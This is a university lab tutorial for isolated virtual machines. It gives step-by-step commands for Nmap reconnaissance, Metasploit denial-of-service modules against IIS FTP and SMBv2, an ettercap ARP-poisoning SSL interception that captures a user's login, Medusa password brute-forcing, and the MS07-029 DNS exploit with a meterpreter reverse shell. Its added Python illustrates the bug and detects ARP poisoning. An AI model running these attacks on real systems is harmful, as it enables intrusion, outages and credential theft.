Page 1
UNIVERSITY OF DERBY
This tutorial uses a brute-force tool to discover the password of an administrator account, then obtains SYSTEM-level (root-equivalent) access to that server by exploiting a stack buffer overflow in the Remote Procedure Call (RPC) interface of the Microsoft Domain Name System (DNS) service. That access is then used to enable Remote Desktop on the server and connect to it with rdesktop.
This tutorial is designed to be enjoyable but also educational, and you are reminded that it is a criminal offence to repeat these attacks without written authorisation from the organisation and individuals involved. Finally, although the virtual machines are completely isolated and unable to communicate with the University network or the public network, monitoring software is in use to ensure that any attempt to breach these security measures is logged.
Prelude
To begin, open the team of virtual machines in VMware Workstation:
1. Click the Windows Start button.
2. Go to Computer and open the root drive (C:\). Open the StudentVMs folder, then STUART BUTCHER and finally Hacking_Final.
3. The Hacking_Final folder contains all of the virtual machines needed for this tutorial. Begin the tutorial by double-clicking the Hacking_Final.vmtm file.
4. VMware Workstation will open with the Hacking_Final team tab displayed. This contains all of the virtual machines.
5. With the team open, click Power on this team in the Commands box. This will start the boot up process.
The servers will start up in a particular order and take approximately 5 minutes before they are ready for use.
6. The virtual machines are ready for use when they display the Press Ctrl-Alt-Delete to logon screen.
To change between virtual machines, select them in the management panel above the console. Please be aware, if you are actively using the virtual machine, i.e. controlling its mouse, you will need to press CTRL + ALT to return to the host.
Reconnaissance
The first task is to determine what else is on the local network and what each active host is responsible for. To do this, we will be using a tool known as Nmap, which is included with BackTrack.
1. In the VMware Workstation window, take control of the ATTACKER virtual machine by selecting it from the management panel above the console.
2. Click the mouse anywhere on the virtual machine console window to take control of it. You will see a prompt bt login: at the bottom of the window. Type the username attacker and press return. You will be asked for the password, which is attacker. You will not be able to see the password as you type it. If you enter it incorrectly, you will need to repeat the process.
3. Following successful log on, the graphical user interface will
4. If a shell window does not automatically appear, click the Konsole application icon on the bottom menu bar.
5. Before it is possible to discover other devices on the local subnet, the attacker needs to know which subnet they belong to. To do this, type ifconfig eth0 into the shell window and press return.
6. Take a note of the IP address and subnet mask.
7. The local IP address is 172.172.1.10 with a subnet mask of 255.255.255.0, so the network address must be 172.172.1.0. To discover other devices within the subnet, type sudo nmap -sP 172.172.1.0/24 into the shell window (-sP is Nmap's ping sweep; newer releases call it -sn and still accept -sP). The sudo command runs the command with administrative privileges and you may therefore be prompted for a password. If this happens, type attacker. Please note that all commands are case sensitive.
8. Nmap reveals four hosts on the local subnet. One of them is BackTrack itself (172.172.1.10), which leaves three targets:
a. 172.172.1.20
b. 172.172.1.100
c. 172.172.1.101
9. With the IP addressing information ascertained, it is now possible to acquire brief details of what services each host is responsible for. To do this, type sudo nmap -v -O {Target IP} (-v increases verbosity; -O requests operating-system detection, which needs raw sockets and is why sudo is required).
10. From the targeted scan, Nmap reveals the operating system, the network interface card's MAC address and the open ports. The ports highlight the services running on the target. Repeat the scan for the remaining hosts.
[Screenshot callouts: Open Ports; Services used by ports; Network Interface Card MAC; Operating System Information]
11. Although there is now a basic understanding of which ports and services are in use, more detailed information can be obtained by interrogating the services themselves. For example, the virtual machine with IP address 172.172.1.101 indicates that it is running Internet Information Services (IIS) for its web server, but does not advertise which version. To discover the version of IIS, type sudo nmap -A -T4 -F 172.172.1.101 (-A enables OS detection, version detection, script scanning and traceroute; -T4 uses aggressive timing; -F scans only the most common ports). Repeat the scan on the remaining hosts.
With some FTP servers, it is possible to gain specific system information by connecting to port 21 with Telnet (telnet {Target IP} 21) and typing SYST.
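As an added example (this is not part of the original tutorial), the following Python script automates the sweep-then-fingerprint loop above: it derives the subnet from ifconfig output, lists the hosts Nmap reports as up (minus BackTrack itself) and pulls the open ports, service versions and MAC address out of a per-host scan. The ifconfig and Nmap outputs embedded in it are constructed to match the lab's addressing so that it runs offline; the MAC address and Nmap version string are made up.

```python
"""Recon helpers for the ifconfig -> nmap -sP -> nmap -v -O workflow.

Added example, not part of the original tutorial. On the ATTACKER VM you would
feed these functions the real output of `ifconfig eth0`,
`sudo nmap -sP -oG - 172.172.1.0/24` and `sudo nmap -v -O <host>`.
"""
import ipaddress
import re

# Constructed sample: the first lines `ifconfig eth0` prints on BackTrack.
SAMPLE_IFCONFIG = """\
eth0      Link encap:Ethernet  HWaddr 00:0C:29:AA:BB:CC
          inet addr:172.172.1.10  Bcast:172.172.1.255  Mask:255.255.255.0
"""

# Constructed sample: grepable (-oG -) output of the ping sweep.
SAMPLE_SWEEP = """\
# Nmap 5.61 scan initiated (constructed sample)
Host: 172.172.1.10 ()   Status: Up
Host: 172.172.1.20 ()   Status: Up
Host: 172.172.1.100 ()  Status: Up
Host: 172.172.1.101 ()  Status: Up
# Nmap done -- 256 IP addresses (4 hosts up) scanned
"""

# Constructed sample: port table and MAC line from a -v -O / -A scan of one host.
SAMPLE_SCAN = """\
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
80/tcp   open  http          Microsoft IIS httpd 7.0
445/tcp  open  microsoft-ds
MAC Address: 00:0C:29:11:22:33 (VMware)
"""


def network_from_ifconfig(output: str) -> ipaddress.IPv4Network:
    """Derive the subnet to sweep from the interface address and dotted mask."""
    m = re.search(r"inet addr:(\d+\.\d+\.\d+\.\d+).*?Mask:(\d+\.\d+\.\d+\.\d+)", output)
    if m is None:
        raise ValueError("no IPv4 address/mask found in ifconfig output")
    # IPv4Interface accepts a dotted netmask; .network drops the host bits.
    return ipaddress.IPv4Interface(f"{m.group(1)}/{m.group(2)}").network


def live_hosts(grepable: str, exclude: frozenset = frozenset()) -> list[str]:
    """Hosts reported 'Up' in `nmap -oG -` output, minus our own address(es)."""
    found = []
    for line in grepable.splitlines():
        m = re.match(r"Host:\s+(\S+)\s+\(.*?\)\s+Status:\s+Up", line)
        if m and m.group(1) not in exclude:
            found.append(m.group(1))
    return found


def parse_scan(normal_output: str) -> dict:
    """Pull open ports (with service/version) and the MAC address out of a port scan."""
    ports, mac = [], None
    for line in normal_output.splitlines():
        m = re.match(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$", line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
            continue
        m = re.match(r"^MAC Address:\s+([0-9A-Fa-f:]{17})", line)
        if m:
            mac = m.group(1).upper()
    return {"ports": ports, "mac": mac}


def fingerprint_commands(grepable: str, own_ip: str) -> list[str]:
    """The per-host scan commands the tutorial asks you to repeat by hand."""
    return [f"sudo nmap -v -O {host}" for host in live_hosts(grepable, frozenset({own_ip}))]


if __name__ == "__main__":
    net = network_from_ifconfig(SAMPLE_IFCONFIG)
    print(f"sweep: sudo nmap -sP -oG - {net}")
    for cmd in fingerprint_commands(SAMPLE_SWEEP, "172.172.1.10"):
        print(cmd)
    scan = parse_scan(SAMPLE_SCAN)
    print("MAC:", scan["mac"])
    for p in scan["ports"]:
        print(f"{p['port']}/{p['proto']} {p['state']} {p['service']} {p['version']}")
```

The grepable (-oG) format is deliberately chosen for the sweep because it is one host per line and stable across Nmap releases, whereas the normal output parsed by parse_scan is for humans and its columns can shift; treat that parser as a convenience for this lab rather than a robust tool.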
Attacks
With the knowledge now gained about the other hosts on the local subnet, it is possible to find vulnerabilities on each. Discovered vulnerabilities are published in the National Vulnerability Database to help administrators protect their systems and vendors to update their software. The information gathered about each host, and the potential vulnerabilities available to be exploited, are shown below.

172.172.1.20 VICT-CLI01
This host is running Windows XP SP2 or SP3, which may make it vulnerable to stack corruption in the Server service's relative path canonicalisation (CVE-2008-4250, MS08-067), which could result in SYSTEM-level (root-equivalent) access.

172.172.1.100 VICT-SRV01
172.172.1.100 appears to be responsible for DNS, Active Directory, web service and email, and is running Windows Server 2003. This host may therefore be vulnerable to an exploit of the RPC interface of the DNS service (CVE-2007-1748, MS07-029). Additionally, as this host also appears to be responsible for email services, it could be possible to conduct a Man-in-the-Middle attack on the HTTPS traffic when a user logs in to their mailbox.
172.172.1.101 VICT-SRV-WEB1
This virtual machine appears to have two interesting services, FTP and HTTP, which suggests that the server hosts one or more web pages and provides a file download/upload service. It is also clear that the server is running a Windows Server 2008 based operating system.
As this host is using IIS 7.0, it is likely that the FTP server is the separately downloadable FTP 7.5 release. It may therefore be vulnerable to a Denial of Service attack caused by a heap overflow in its handling of Telnet IAC (0xFF) bytes (CVE-2010-3972, MS11-004). Further to this, Nmap has indicated that it supports SMB v2, which is known to be vulnerable to an array index error when an ampersand character (0x26) is supplied in the Process ID High field of the SMB header. This triggers an attempted dereference of an out-of-bounds memory location and consequently results in a Blue Screen of Death (CVE-2009-3103, MS09-050).
IIS FTP 7.5 DoS
It is possible to terminate the FTP service on a Windows server running FTP 7.5. The vulnerability occurs when the FTP server encodes a response containing Telnet IAC (0xFF) bytes: each 0xFF must be escaped as 0xFF 0xFF, but the response buffer is sized for the unescaped data, so a client-supplied string of 0xFF bytes that is echoed back in a response is written past the end of the heap buffer, resulting in a heap buffer overrun. This can be demonstrated in the Metasploit Framework.
1. Change control to VICT-SRV-WEB1. If control is currently focused on a different virtual machine, press CTRL+ALT first to return control to the host computer.
2. Log in by pressing CTRL+ALT+INSERT and typing H4ckM3! as the password.
3. Once logged in, click the Start button, type services.msc into the search bar and press return.
4. A window listing all system services will be populated. Scroll through the list to find Microsoft FTP Service. It will show the service as Started.
5. Change control back to the ATTACKER virtual machine and open a shell window.
6. Verify that it is possible to connect to the FTP server by typing ftp 172.172.1.101. If the FTP server is running and accepting new connections, it will display the welcome banner (220 Microsoft FTP Service) and prompt for a login name.
7. Press return twice and then type quit.
8. Type sudo msfconsole. If prompted for a password, enter attacker. It may take a short while to load.
9. Select the module to be used by typing use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof and pressing return.
10. Select the target by typing set RHOST 172.172.1.101.
11. Launch the attack by typing run.
12. The attack will be launched. A completion message will be returned following the execution.
13. Change back to VICT-SRV-WEB1 and refresh the Services window. Do not close the shell window on BackTrack.
14. Find Microsoft FTP Service and notice that it is no longer Started.
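Before confirming the result, it is worth seeing why the module's run of 0xFF bytes stops the service. The following is an added example in Python, not part of the original tutorial and not Microsoft's code: a simplified model of the Telnet IAC escaping error behind CVE-2010-3972. The HeapBuffer class stands in for a real heap allocation and merely counts out-of-bounds writes, and the echoed reply format in build_response is an assumption chosen to resemble an FTP error line.

```python
"""Why a run of 0xFF bytes overruns the FTP response buffer (simplified model).

Added example, not part of the original tutorial and not IIS code. The
`HeapBuffer` class counts writes past the end of the allocation instead of
corrupting memory, and `build_response` assumes a 5xx reply that echoes a
client-supplied string.
"""

IAC = 0xFF  # Telnet "Interpret As Command"; a literal 0xFF is sent on the wire as 0xFF 0xFF


class HeapBuffer:
    """Fixed-capacity buffer that records writes past its end rather than corrupting memory."""

    def __init__(self, capacity: int) -> None:
        self.capacity = capacity
        self.data = bytearray(capacity)
        self.overflow = 0  # bytes that would have landed on neighbouring heap data

    def write(self, pos: int, value: int) -> None:
        if pos < self.capacity:
            self.data[pos] = value
        else:
            self.overflow += 1


def escaped_length(response: bytes) -> int:
    """Size the output really needs once every IAC byte is doubled."""
    return len(response) + response.count(IAC)


def _escape_into(buf: HeapBuffer, response: bytes) -> None:
    """Copy the response into buf, doubling each 0xFF; no bounds check, as in the bug."""
    pos = 0
    for b in response:
        buf.write(pos, b)
        pos += 1
        if b == IAC:
            buf.write(pos, IAC)
            pos += 1


def encode_vulnerable(response: bytes) -> HeapBuffer:
    """Bug: the buffer is sized for the unescaped response, so escaping can run past it."""
    buf = HeapBuffer(len(response))
    _escape_into(buf, response)
    return buf


def encode_fixed(response: bytes) -> HeapBuffer:
    """Fix: allocate for the escaped length before writing."""
    buf = HeapBuffer(escaped_length(response))
    _escape_into(buf, response)
    return buf


def build_response(client_string: bytes) -> bytes:
    """Assumed reply format: the server echoes a client-supplied string in an error line."""
    return b"550 " + client_string + b": file not found.\r\n"


if __name__ == "__main__":
    hostile = build_response(bytes([IAC]) * 64)  # constructed: what a DoS client provokes
    print("overflow with vulnerable encoder:", encode_vulnerable(hostile).overflow, "bytes")
    print("overflow with fixed encoder:     ", encode_fixed(hostile).overflow, "bytes")
```

The point to take away is that the overrun length equals the number of 0xFF bytes the client can get echoed back, so an attacker controls both whether the overflow happens and how far it extends; a normal banner such as 220 Microsoft FTP Service contains no IAC bytes and never triggers it.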
The FTP service is no longer running. The attack has been successful.

Server Message Block (SMB) Blue Screen of Death (BSoD)
The reconnaissance also identified that VICT-SRV-WEB1 uses SMBv2, which has a known vulnerability (CVE-2009-3103). Successful exploitation would allow an attacker to execute code with SYSTEM-level privileges; failed exploit attempts result in a Denial of Service. The Metasploit module used here does not attempt code execution: it only sends the malformed negotiate request, which crashes the kernel SMB driver (srv2.sys) and produces the BSoD.
1. On BackTrack, at the msfconsole prompt used previously, type use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh. If you closed the shell window, open a new one and type sudo msfconsole to start Metasploit again.
2. Set the target by entering set RHOST {Target IP}.
3. Execute the attack by typing run.
4. Change control to VICT-SRV-WEB1.
5. The virtual machine should be displaying a Blue Screen of Death. The error text shows that the attack caused a dereference of an out-of-bounds memory location.
The victim will automatically reboot. The attack has been successful.
Secure Sockets Layer (SSL) Man-in-the-Middle Attack
Nmap revealed that there is an XP machine on the network, which is most likely a user's computer, and identified 172.172.1.100 as the mail server. It is therefore possible to poison the client's ARP cache so that traffic for the mail server is sent to the attacker, who can then sniff it and intercept the SSL session by acting as a middle-man.
1. Change control to VICT-CLI01 and press CTRL+ALT+INSERT. Enter thevictim as the username and Password01 as the password.
3. When the page begins to load, a security alert window will appear. Click View Certificate.
4. The certificate will display three tabs, General, Details, and Certification Path. Open the Details tab.
5. The details tab contains all of the information relating to the site certificate. Take a note of the Issuer and information within the text box below.
7. Enter the username thevictim and the password Password01, then click Log On.
8. The user's inbox will now be displayed. Click Log Off and then close the window.
10. Change control to ATTACKER and, from within a shell window, type sudo ettercap -Tq -i eth0 -M arp:remote,oneway /172.172.1.20/ /172.172.1.100/ . If prompted, enter the password attacker. (-T selects text mode, -q suppresses packet dumps, -i chooses the interface, and -M arp:remote,oneway poisons only the client's ARP entry for the mail server rather than both directions.)
11. Forged ARP replies are now being sent. Change back to VICT-CLI01. If the virtual machine is locked, press CTRL+ALT+INSERT and enter thevictim as the username and Password01 as the password.
12. Click the Start button and open Internet Explorer. When the security alert window displays, click View Certificate.
13. Click the Details tab and take a note of the Issuer.
14. The difference in issuer demonstrates that the SSL traffic is being intercepted: the browser is now seeing a certificate generated by ettercap rather than the mail server's own, and the security alert is the only warning the user gets.
15. Click OK and then Yes to continue loading the web page.
16. Enter the username thevictim and the password Password01 on the login page, then click Log On to load the user's inbox.
17. Once successfully logged in, change control back to ATTACKER and notice that the captured username and password are printed in the shell window.
18. In the shell window, type q; sniffing and poisoning will terminate and ettercap will re-ARP the victims so that their caches return to normal.
19. Return to VICT-CLI01 and click Log Off. If the virtual machine is locked, enter thevictim as the username and Password01 as the password.
20. Shut down the VICT-CLI01 virtual machine by clicking the Start button and then Shut Down. Click OK on the next window.
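The certificate warning is what the user sees; on the host itself the poisoning is visible in the ARP cache. As an added example (not part of the original tutorial), the Python below compares a victim's arp -a listing against the MAC addresses recorded during reconnaissance and flags the two signatures of ARP poisoning: an entry whose MAC has changed, and one MAC claimed by two IP addresses. Both arp -a listings and all MAC addresses are constructed for this example; in the lab you would take the baseline from the nmap -v -O scans and the listings from the Windows XP client before and after step 10.

```python
"""Spotting the ARP poisoning behind the SSL man-in-the-middle.

Added example, not part of the original tutorial. Compares a victim's ARP
cache (Windows `arp -a` format) with the MAC addresses Nmap reported during
reconnaissance. Both listings and every MAC address below are constructed.
"""
import re

# Constructed: MAC addresses as they would be recorded from the `nmap -v -O` scans.
BASELINE_MACS = {
    "172.172.1.10":  "00-0c-29-aa-aa-aa",   # ATTACKER (BackTrack)
    "172.172.1.100": "00-0c-29-bb-bb-bb",   # VICT-SRV01 (mail / DNS / AD)
    "172.172.1.101": "00-0c-29-cc-cc-cc",   # VICT-SRV-WEB1
}

# Constructed: `arp -a` on VICT-CLI01 before ettercap is started.
ARP_BEFORE = """\
Interface: 172.172.1.20 --- 0x2
  Internet Address      Physical Address      Type
  172.172.1.10          00-0c-29-aa-aa-aa     dynamic
  172.172.1.100         00-0c-29-bb-bb-bb     dynamic
"""

# Constructed: the same listing while `-M arp:remote,oneway` is running; the
# mail server's entry now carries the attacker's MAC.
ARP_AFTER = """\
Interface: 172.172.1.20 --- 0x2
  Internet Address      Physical Address      Type
  172.172.1.10          00-0c-29-aa-aa-aa     dynamic
  172.172.1.100         00-0c-29-aa-aa-aa     dynamic
"""

ENTRY = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)"
)


def parse_arp_table(text: str) -> dict[str, str]:
    """Map IP -> MAC (lower-case, dash-separated) from `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace(":", "-")
    return table


def mac_mismatches(table: dict[str, str], baseline: dict[str, str]) -> list[tuple[str, str, str]]:
    """(ip, observed, expected) for every cached entry that disagrees with the baseline."""
    return [(ip, mac, baseline[ip]) for ip, mac in table.items()
            if ip in baseline and baseline[ip] != mac]


def shared_macs(table: dict[str, str]) -> dict[str, list[str]]:
    """MACs claimed by more than one IP: the classic poisoning signature."""
    by_mac: dict[str, list[str]] = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def poisoning_suspected(text: str, baseline: dict[str, str]) -> bool:
    """True if the cache contradicts the baseline or one MAC answers for several IPs."""
    table = parse_arp_table(text)
    return bool(mac_mismatches(table, baseline) or shared_macs(table))


if __name__ == "__main__":
    for label, listing in (("before", ARP_BEFORE), ("after", ARP_AFTER)):
        table = parse_arp_table(listing)
        print(label, "mismatches:", mac_mismatches(table, BASELINE_MACS),
              "shared:", shared_macs(table))
```

The duplicate-MAC check needs no baseline at all, which is why it is the one most host intrusion agents implement; the baseline comparison is stronger but only as good as the inventory it is compared against. Either way, the defence that removes the attack rather than merely detecting it is for the user to refuse the certificate at step 15.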
Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission Control Protocol (TCP) Overflow
Nmap identified that the server with IP address 172.172.1.100 is not only an e-mail server but also responsible for DNS and Active Directory. Nmap also highlighted that the system is relatively unpatched, and a known vulnerability in that OS and service pack (CVE-2007-1748, MS07-029) is a stack buffer overflow in the RPC interface of the DNS service, triggered when a long zone name parameter containing escaped octal strings is supplied over TCP. Exploiting it gives SYSTEM-level (root-equivalent) access. However, in order to take control of the server's graphical user interface, the administrator credentials must be known. For this part, it is assumed that the administrator username is Administrator.
1. On the ATTACKER machine, minimise the shell window if one is open.
2. On the desktop there is a file titled passwords. Click on it to open it. When prompted, click Open Session.
3. A text file containing a list of passwords will be displayed.
4. Close this window by clicking the X at the top right of the window.
5. Restore the shell window, or open a new one if there was not one already open.
6. Start the brute-forcing tool Medusa by typing medusa -h 172.172.1.100 -u Administrator -P /home/attacker/passwords -f -F -M smbnt and pressing return. (-h names the host, -u the single username to try, -P the password file and -M smbnt the SMB authentication module; -f and -F stop as soon as a valid password is found.) Note that in a production domain a password run like this against the Administrator account would quickly trigger the account lockout policy and fill the security log with failed-logon events.
7. Medusa will try every password in the file. When it finds the correct one, it will display SUCCESS.
8. Take a note of the password and run Metasploit by typing sudo msfconsole. If prompted for the password, type attacker.
9. When Metasploit has loaded, type use exploit/windows/dcerpc/ms07_029_msdns_zonename and press return.
10. Select the payload to be used by typing set PAYLOAD windows/meterpreter/reverse_tcp and pressing return.
11. Define the address the reverse Transmission Control Protocol (TCP) connection should call back to by typing set LHOST 172.172.1.10.
12. Enter the target address by typing set RHOST 172.172.1.100.
13. Type exploit to execute the attack.
14. If the attack is successful, a Meterpreter session with the server will be established.
15. To make the server's desktop reachable, type run getgui -e. This enables Remote Desktop on the server.
16. Open a new shell window. When the prompt displays, type rdesktop -u Administrator -p 'H4ckM3!' 172.172.1.100 and press return (the password is quoted so that the shell does not interpret the exclamation mark).
18. It is not possible to shut the server down unless a comment is given. In the comment box, press space and then click OK.
19. The server will warn that other users will be disconnected. Click Yes to continue.
20. The server will now begin the shutdown process. Confirm this by changing control to the VICT-SRV01 virtual machine. When the server shuts down, this attack is complete. In a production environment, the loss of the e-mail server and domain controller would cause major disruption to a business.

Cleaning Up
To complete the tutorial, shut down the remaining virtual machines:
1. Take control of VICT-SRV-WEB1 and press CTRL+ALT+INSERT to log in. Use the username Administrator and the password H4ckM3!
2. If asked for a reason why the server unexpectedly shut down, press the spacebar in the comments box followed by OK.
3. Once logged in, click the Start button followed by the right-arrow button next to the padlock icon.
5. If asked for a reason for shut down, press the spacebar in the comments box and click OK.
6. The server will begin the shutdown sequence. Change control to the ATTACKER virtual machine.
7. Close any shell windows that may be open, and click the far-left icon on the menu bar.
8. When the panel displays, click Log Out. Another window will appear. Click Log Out on this new window.
9. Once the graphical user interface has closed, click anywhere in the console window to ensure it is taking keyboard input. Type sudo poweroff. When prompted, enter the password attacker.
10. The system will now begin shutting down. When all virtual machines have shut down, the Hacking_Final home tab will be displayed in VMware Workstation. Thank you for taking part in this investigation. Please complete the online survey. The password for the survey is Attacker.